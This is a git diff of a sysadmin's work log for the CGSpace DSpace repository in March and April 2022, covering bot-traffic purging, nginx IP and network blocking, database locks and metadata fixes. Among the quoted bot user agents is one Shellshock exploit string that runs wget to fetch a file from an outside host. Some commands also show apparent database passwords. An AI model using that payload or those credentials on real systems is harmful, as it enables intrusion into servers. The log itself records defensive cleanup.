April, 2022
+March, 2022
2022-04-01
+2022-03-01
-
-
- I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday +
- Send Gaia the last batch of potential duplicates for items 701 to 980: +
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
+$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
+$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+
2022-03-04
-
-
- The Discovery indexing took this long: +
- Looking over the CGSpace Solr statistics from 2022-02
+
-
+
- I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more! +
- Here are some of the more prevalent or weird ones:
+
-
+
- axios/0.21.1 +
- Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com) +
- Nutraspace/Nutch-1.2 (www.nutraspace.com) +
- Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com) +
- Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com +
- Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/) +
- Crowsnest/0.5 (+http://www.crowsnest.tv/) +
- Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com +
- metha/0.2.27 +
- ZaloPC-win32-24v454 +
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x +
- ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org) +
- FullStoryBot/1.0 (+https://www.fullstory.com) +
- Link Validity Check From: http://www.usgs.gov +
- OSPScraper (+https://www.opensyllabusproject.org) +
- () { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832" +
+ - I submitted a pull request to COUNTER-Robots with some of these +
+ - I purged a bunch of hits from the stats using the
check-spider-hits.sh
script:
+
]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
+Purging 6 hits from scalaj-http in statistics
+Purging 5 hits from lua-resty-http in statistics
+Purging 9 hits from AHC in statistics
+Purging 7 hits from acebookexternalhit in statistics
+Purging 1011 hits from axios\/[0-9] in statistics
+Purging 2216 hits from Faveeo\/[0-9] in statistics
+Purging 1164 hits from Moreover\/[0-9] in statistics
+Purging 740 hits from Exploratodo\/[0-9] in statistics
+Purging 585 hits from GroupHigh\/[0-9] in statistics
+Purging 438 hits from Crowsnest\/[0-9] in statistics
+Purging 1326 hits from nbertaupete95 in statistics
+Purging 182 hits from metha\/[0-9] in statistics
+Purging 68 hits from ZaloPC-win32-24v454 in statistics
+Purging 1644 hits from Firefox\/x\.x in statistics
+Purging 678 hits from ZoteroTranslationServer in statistics
+Purging 27 hits from FullStoryBot in statistics
+Purging 26 hits from Link Validity Check in statistics
+Purging 26 hits from OSPScraper in statistics
+Purging 1 hits from 3137382e37392e3138372e313832 in statistics
+Purging 2755 hits from Nutch-[0-9] in statistics
+
+Total number of bot hits purged: 12914
+
-
+
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project +
2022-03-05
+-
+
- Start AReS harvest +
2022-03-10
+-
+
- A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
+
-
+
- I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
real 334m33.625s
-user 227m51.331s
-sys 3m43.037s
-
2022-04-04
+or(
+isNotNull(value.match('707')),
+isNotNull(value.match('709')),
+isNotNull(value.match('710')),
+isNotNull(value.match('711')),
+isNotNull(value.match('713')),
+isNotNull(value.match('717')),
+isNotNull(value.match('718')),
+...
+isNotNull(value.match('821'))
+)
+
-
+
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test: +
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-10-tac-batch4-701to980.map
+
2022-03-12
-
+
- Update all containers and rebuild OpenRXV on linode20: +
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+$ docker-compose build
+
-
+
- Then run all system updates and reboot
- Start a full harvest on AReS -
- Help Marianne with submit/approve access on a new collection on CGSpace -
- Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) -
- Looking at the Solr statistics for 2022-03 on CGSpace +
2022-03-16
-
-
- I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent:
Apache-HttpClient/4.5.9 (Java/1.8.0_322)
, and many others with a normal browser agent, so that’s fishy!
- - The DSpace agent pattern
http.?agent
seems to have caught the first ones, but I’ll purge the IP ones
- - I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for
dns:*msnbot* AND dns:*.msn.com.
I see over 100,000, which is a problem I noticed a few months ago too…
- - I extracted the MSN Bot IPs from Solr using an IP facet, then used the
check-spider-ip-hits.sh
script to purge them
+ - Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
+
-
+
- We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing
2022-04-10
+2022-03-20
- Start a full harvest on AReS
2022-04-13
+2022-03-21
-
-
- UptimeRobot mailed to say that CGSpace was down +
- Review a few submissions for Open Repositories 2022 +
- Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed +
2022-03-22
-
-
- I looked and found the load at 44… +
- I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
+
-
+
- I had been meaning to update my local database… +
+ - I re-imported the CGIAR CAS documents to DSpace Test and generated the PDF thumbnails: +
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-22-tac-700.map
+$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10568/118432
+
-
+
- On my local environment I decided to run the
check-duplicates.py
script one more time with all 700 items:
+
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-03-22-tac-duplicates.csv
+$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
+$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
+
-
+
- I sent the resulting 76 items to Gaia to check +
- UptimeRobot said that CGSpace was down
+
-
+
- I looked and found many locks belonging to the REST API application:
- - There seem to be a lot of locks from the XMLUI:
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
- 3173 dspaceWeb
+ 301 dspaceWeb
+ 2390 dspaceApi
-
-
- Looking at the top IPs in nginx’s access log one IP in particular stands out: +
- Looking at nginx’s logs, I found the top addresses making requests today:
941 66.249.66.222
- 1224 95.108.213.28
- 2074 157.90.209.76
- 3064 66.249.66.221
- 95743 185.192.69.15
+# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -h
+ 1977 45.5.184.2
+ 3167 70.32.90.172
+ 4754 54.195.118.125
+ 5411 205.186.128.185
+ 6826 137.184.159.211
-- 185.192.69.15 is in the UK
-- I added a block for that IP in nginx and the load went down…
+- 137.184.159.211 is on DigitalOcean using this user agent:
GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28
+
+- I blocked this IP in nginx and the load went down immediately
-2022-04-16
+
+- 205.186.128.185 is on Media Temple, but it’s OK because it’s the CCAFS publications importer bot
+- 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)
+- 70.32.90.172 is on Media Temple and has no user agent
+- What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
-- Start harvest on AReS
-
-2022-04-18
-
-- I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I’m on holiday out of the country for Easter)
-
-- I see there are many locks in use from the XMLUI:
+- I verified it works as expected with an empty user agent:
-$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
- 8932 dspaceWeb
+$ curl -H User-Agent:'' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
+Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
-- Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:
+- I note that the nginx log shows ‘-’ for a request with an empty user agent, which would be indistinguishable from a request with a ‘-’, for example these were successful:
-# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort | uniq -c | sort -h
- 752 69.162.124.231
- 759 66.249.64.213
- 864 66.249.66.222
- 905 2a01:4f8:221:f::2
- 1013 84.33.2.97
- 1201 157.55.39.159
- 1204 157.55.39.144
- 1209 157.55.39.102
- 1217 157.55.39.161
- 1252 207.46.13.177
- 1274 157.55.39.162
- 2553 66.249.66.221
- 2941 95.108.213.28
+70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
+70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
-- One IP is using a stange user agent though:
+- I can only assume that these requests used a literal ‘-’ so I will have to add an nginx rule to block those too
+- Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester… I should ask Macaroni Bros about that
-84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
-
-- Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):
-
-# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
-17314
-
-- That’s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
+
2022-03-24
-- The ISPs I’ve seen so far are ChinaNet and China Unicom
+- Maria from ABC asked about a reporting discrepancy on AReS
+
+- I think it’s because the last harvest was over the weekend, and she was expecting to see items submitted this week
-- I extracted all the IPs from today and resolved them:
-
-# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq > /tmp/2022-04-18-ips.txt
-$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
-
-- The top ASNs by IP are:
-
-$ csvcut -c 2 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
- 102 GOOGLE
- 139 Maxihost LTDA
- 165 AMAZON-02
- 393 "China Mobile Communications Group Co., Ltd."
- 473 AMAZON-AES
- 616 China Mobile communications corporation
- 642 M247 Ltd
- 2336 HostRoyale Technologies Pvt Ltd
- 4556 Chinanet
- 5527 CHINA UNICOM China169 Backbone
-$ csvcut -c 4 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
- 139 262287
- 165 16509
- 180 204287
- 393 9808
- 473 14618
- 615 56041
- 642 9009
- 2156 203020
- 4556 4134
- 5527 4837
-
-- I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc
-- I will download the IP blocks for each ASN except Google and Amazon and ban them
-
-$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
-$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
-20296
-
-- I extracted the IPv4 and IPv6 networks:
-
-$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep ":" | sort > /tmp/ipv6-networks.txt
-$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep -v ":" | sort > /tmp/ipv4-networks.txt
-
-- I suspect we need to aggregate these networks since they are so many and nftables doesn’t like it when they overlap:
-
-$ wc -l /tmp/ipv4-networks.txt
-15464 /tmp/ipv4-networks.txt
-$ aggregate6 /tmp/ipv4-networks.txt | wc -l
-2781
-$ wc -l /tmp/ipv6-networks.txt
-4833 /tmp/ipv6-networks.txt
-$ aggregate6 /tmp/ipv6-networks.txt | wc -l
-338
-
-- I deployed these lists on CGSpace, ran all updates, and rebooted the server
+
- Paola from ABC said they are decomissioning the server where many of their library PDFs are hosted
-- This list is SURELY too broad because we will block legitimate users in China… but right now how can I discern?
-- Also, I need to purge the hits from these 14,000 IPs in Solr when I get time
+- She asked if we can download them and upload them directly to CGSpace
-- Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:
-
-
-
+ - I re-created my local Artifactory container
+- I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
-- I used
grepcidr
with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:
+- One thing I realized is that OAI is no longer a standalone web application, it is part of the
server
app now: http://localhost:8080/server/oai/request?verb=Identify
-# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort -u > /tmp/ips.log
-# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; done < /tmp/ipv4-networks-aggregated.txt
-# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; done < /tmp/ipv6-networks-aggregated.txt
-# wc -l /tmp/ipv4-ips.txt
-15313 /tmp/ipv4-ips.txt
-# wc -l /tmp/ipv6-ips.txt
-19 /tmp/ipv6-ips.txt
-
-- Then I purged them from Solr using the
check-spider-ip-hits.sh
:
-
-$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
-
2022-04-23
+
+- Deploy PostgreSQL 12 on CGSpace (linode18) but don’t switch over yet, because I see some users active
-- A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the
example
file that contains most patterns
-
-- I updated CGSpace, then ran all system updates and rebooted the host
-- I also ran
dspace cleanup -v
to prune the database
+- I did this on DSpace Test in 2022-02 so I just followed the same procedure
+- After that I ran all system updates and rebooted the server
-2022-04-24
+2022-03-25
+- Looking at the PostgreSQL database size on CGSpace after the update yesterday:
+
+
+
+- The space saving in indexes of recent PostgreSQL releases is awesome!
+- Import a DSpace 6.x database dump from production into my local DSpace 7 database
+
+- I see I still the same errors I saw in 2021-04 when testing DSpace 7.0 beta 5
+- I had to delete some old migrations, as well as all Atmire ones first:
+
+
+
+localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
+localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%'
+
+- Then I was able to migrate to DSpace 7 with
dspace database migrate ignored
as the DSpace upgrade notes say
+
+- I see that the flash of unstyled content bug still exists on dspace-angluar… ouch!
+
+
- Start a harvest on AReS
-2022-04-25
+2022-03-26
-- Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have
+
- Update dspace-statistics-api to Falcon 3.1.0 and release v1.4.3
+
+2022-03-28
-- There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can’t
-- I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete
+- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
-
-- I notice we have over 1,000 items with region
Africa South of Sahara
-
-- I am surprised to see these because we did a mass migration to
Sub-Saharan Africa
in 2020-10 when we aligned to UN M.49
-- Oh! It seems I used a capital O in
Of
!
-- This is curious, I see we missed
East Asia
and Northern America
, because those are still in our list, but UN M.49 uses Eastern Asia
and Northern America
… I will have to raise that with Peter and Abenet later
-- For now I will just re-run my fixes:
-
-
-
-$ cat /tmp/regions.csv
-cg.coverage.region,correct
-East Africa,Eastern Africa
-West Africa,Western Africa
-Southeast Asia,South-eastern Asia
-South Asia,Southern Asia
-Africa South of Sahara,Sub-Saharan Africa
-North Africa,Northern Africa
-West Asia,Western Asia
-$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 227 -t correct
+$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
-- Then I started a new harvest on AReS
+- I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
+
+- According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
+
+
+- Abenet and I noticed 1,735 items in CTA’s community that have the title “delete”
+
+- We asked Peter and he said we should delete them
+- I exported the CTA community metadata and used OpenRefine to filter all items with the “delete” title, then used the “expunge” bulkedit action to remove them
+
+
+- I realized I forgot to clean up the old Let’s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
+
+- I also removed the pre-Ubuntu 20.04 Let’s Encrypt stuff from the Ansble infrastructure playbooks
+
+
+
+2022-03-29
+
+- Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
+
+- I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
+
+
+
+or(
+isNotNull(value.match('33')),
+isNotNull(value.match('179')),
+isNotNull(value.match('452')),
+isNotNull(value.match('489')),
+isNotNull(value.match('541')),
+isNotNull(value.match('568')),
+isNotNull(value.match('646')),
+isNotNull(value.match('889'))
+)
+
+- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:
+
+$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
+$ dspace import --add --eperson=umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-29-cgiar-tac.map
+$ chrt -b 0 dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10947/50
+
+- After that I did some normalization on the
cg.subject.system
metadata and extracted a few dozen countries to the country field
+- Start a harvest on AReS
+
+2022-03-30
+
+- Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well
+
+$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuu'
+
+- I started looking into the request regarding the CIAT Library PDFs
+
+- There are over 4,000 links to PDFs hosted on that server in CGSpace metadata
+- The links seem to be down though! I emailed Paola to ask
+
+
+
+2022-03-31
+
+- Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC
+- I will do the following for CMS and G1GC on DSpace Test:
+
+- Wait for startup
+- Reload home page
+- Log in
+- Do a search for “livestock”
+- Click AGROVOC facet for livestock
+- dspace index-discovery -b
+- dspace-statistics-api index
+
+
+- With CMS the Discovery Index took:
+
+real 379m19.245s
+user 267m17.704s
+sys 4m2.937s
+
+- Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic
+
+- I extracted a list of URLs from CGSpace to send him:
+
+
+
+localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
+COPY 4552
+
+- I did some checks and cleanups in OpenRefine because there are some values with “#page” etc
+
+- Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs
+- I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books
+
+
-
@@ -344,9 +476,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/2022-04/index.html b/docs/2022-04/index.html
new file mode 100644
index 000000000..b8fe71cc9
--- /dev/null
+++ b/docs/2022-04/index.html
@@ -0,0 +1,529 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ April, 2022 | CGSpace Notes
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CGSpace Notes
+ Documenting day-to-day work on the CGSpace repository.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ April, 2022
+
+
+ 2022-04-01
+
+- I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday
+
+- The Discovery indexing took this long:
+
+
+
+real 334m33.625s
+user 227m51.331s
+sys 3m43.037s
+
2022-04-04
+
+- Start a full harvest on AReS
+- Help Marianne with submit/approve access on a new collection on CGSpace
+- Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)
+- Looking at the Solr statistics for 2022-03 on CGSpace
+
+- I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent:
Apache-HttpClient/4.5.9 (Java/1.8.0_322)
, and many others with a normal browser agent, so that’s fishy!
+- The DSpace agent pattern
http.?agent
seems to have caught the first ones, but I’ll purge the IP ones
+- I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for
dns:*msnbot* AND dns:*.msn.com.
I see over 100,000, which is a problem I noticed a few months ago too…
+- I extracted the MSN Bot IPs from Solr using an IP facet, then used the
check-spider-ip-hits.sh
script to purge them
+
+
+
+2022-04-10
+
+- Start a full harvest on AReS
+
+2022-04-13
+
+- UptimeRobot mailed to say that CGSpace was down
+
+- I looked and found the load at 44…
+
+
+- There seem to be a lot of locks from the XMLUI:
+
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
+ 3173 dspaceWeb
+
+- Looking at the top IPs in nginx’s access log one IP in particular stands out:
+
+ 941 66.249.66.222
+ 1224 95.108.213.28
+ 2074 157.90.209.76
+ 3064 66.249.66.221
+ 95743 185.192.69.15
+
+- 185.192.69.15 is in the UK
+- I added a block for that IP in nginx and the load went down…
+
+2022-04-16
+
+- Start harvest on AReS
+
+2022-04-18
+
+- I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I’m on holiday out of the country for Easter)
+
+- I see there are many locks in use from the XMLUI:
+
+
+
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
+ 8932 dspaceWeb
+
+- Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:
+
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort | uniq -c | sort -h
+ 752 69.162.124.231
+ 759 66.249.64.213
+ 864 66.249.66.222
+ 905 2a01:4f8:221:f::2
+ 1013 84.33.2.97
+ 1201 157.55.39.159
+ 1204 157.55.39.144
+ 1209 157.55.39.102
+ 1217 157.55.39.161
+ 1252 207.46.13.177
+ 1274 157.55.39.162
+ 2553 66.249.66.221
+ 2941 95.108.213.28
+
+- One IP is using a stange user agent though:
+
+84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
+
+- Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
+17314
+
+- That’s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
+
+- The ISPs I’ve seen so far are ChinaNet and China Unicom
+
+
+- I extracted all the IPs from today and resolved them:
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq > /tmp/2022-04-18-ips.txt
+$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
+
+- The top ASNs by IP are:
+
+$ csvcut -c 2 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
+ 102 GOOGLE
+ 139 Maxihost LTDA
+ 165 AMAZON-02
+ 393 "China Mobile Communications Group Co., Ltd."
+ 473 AMAZON-AES
+ 616 China Mobile communications corporation
+ 642 M247 Ltd
+ 2336 HostRoyale Technologies Pvt Ltd
+ 4556 Chinanet
+ 5527 CHINA UNICOM China169 Backbone
+$ csvcut -c 4 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
+ 139 262287
+ 165 16509
+ 180 204287
+ 393 9808
+ 473 14618
+ 615 56041
+ 642 9009
+ 2156 203020
+ 4556 4134
+ 5527 4837
+
+- I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc
+- I will download the IP blocks for each ASN except Google and Amazon and ban them
+
+$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
+20296
+
+- I extracted the IPv4 and IPv6 networks:
+
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep ":" | sort > /tmp/ipv6-networks.txt
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep -v ":" | sort > /tmp/ipv4-networks.txt
+
+- I suspect we need to aggregate these networks since they are so many and nftables doesn’t like it when they overlap:
+
+$ wc -l /tmp/ipv4-networks.txt
+15464 /tmp/ipv4-networks.txt
+$ aggregate6 /tmp/ipv4-networks.txt | wc -l
+2781
+$ wc -l /tmp/ipv6-networks.txt
+4833 /tmp/ipv6-networks.txt
+$ aggregate6 /tmp/ipv6-networks.txt | wc -l
+338
+
+- I deployed these lists on CGSpace, ran all updates, and rebooted the server
+
+- This list is SURELY too broad because we will block legitimate users in China… but right now how can I discern?
+- Also, I need to purge the hits from these 14,000 IPs in Solr when I get time
+
+
+- Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:
+
+
+
+
+- I used
grepcidr
with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:
+
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort -u > /tmp/ips.log
+# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; done < /tmp/ipv4-networks-aggregated.txt
+# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; done < /tmp/ipv6-networks-aggregated.txt
+# wc -l /tmp/ipv4-ips.txt
+15313 /tmp/ipv4-ips.txt
+# wc -l /tmp/ipv6-ips.txt
+19 /tmp/ipv6-ips.txt
+
+- Then I purged them from Solr using the
check-spider-ip-hits.sh
:
+
+$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
+
2022-04-23
+
+- A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the
example
file that contains most patterns
+
+- I updated CGSpace, then ran all system updates and rebooted the host
+- I also ran
dspace cleanup -v
to prune the database
+
+
+
+2022-04-24
+
+- Start a harvest on AReS
+
+2022-04-25
+
+- Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have
+
+- There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can’t
+- I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete
+
+
+- I notice we have over 1,000 items with region
Africa South of Sahara
+
+- I am surprised to see these because we did a mass migration to
Sub-Saharan Africa
in 2020-10 when we aligned to UN M.49
+- Oh! It seems I used a capital O in
Of
!
+- This is curious, I see we missed
East Asia
and Northern America
, because those are still in our list, but UN M.49 uses Eastern Asia
and Northern America
… I will have to raise that with Peter and Abenet later
+- For now I will just re-run my fixes:
+
+
+
+$ cat /tmp/regions.csv
+cg.coverage.region,correct
+East Africa,Eastern Africa
+West Africa,Western Africa
+Southeast Asia,South-eastern Asia
+South Asia,Southern Asia
+Africa South of Sahara,Sub-Saharan Africa
+North Africa,Northern Africa
+West Asia,Western Asia
+$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 227 -t correct
+
+- Then I started a new harvest on AReS
+
+2022-04-27
+
+- I woke up to many up down notices for CGSpace from UptimeRobot
+
+- The server has load 111.0… sigh.
+
+
+- According to Grafana it seems to have started at 4:00 AM
+
+
+
+- There are a metric fuck ton of database locks from the XMLUI:
+
